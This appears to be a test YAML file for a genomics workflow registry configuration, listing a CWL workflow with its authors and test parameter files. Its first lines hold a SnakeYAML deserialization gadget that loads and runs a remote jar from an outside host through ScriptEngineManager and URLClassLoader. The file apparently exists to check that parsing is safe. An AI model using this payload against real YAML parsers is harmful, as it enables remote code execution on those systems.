!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]
version: 1.2
workflows:
   - subclass: CWL
     name: 222test222
     primaryDescriptorPath: /potato.cwl
     authors:
       - name: UCSC Genomics Institute
         role: Institute
         affiliation: UCSC
     publish: True
     testParameterFiles:
         - /test/dockstore.cwl.json
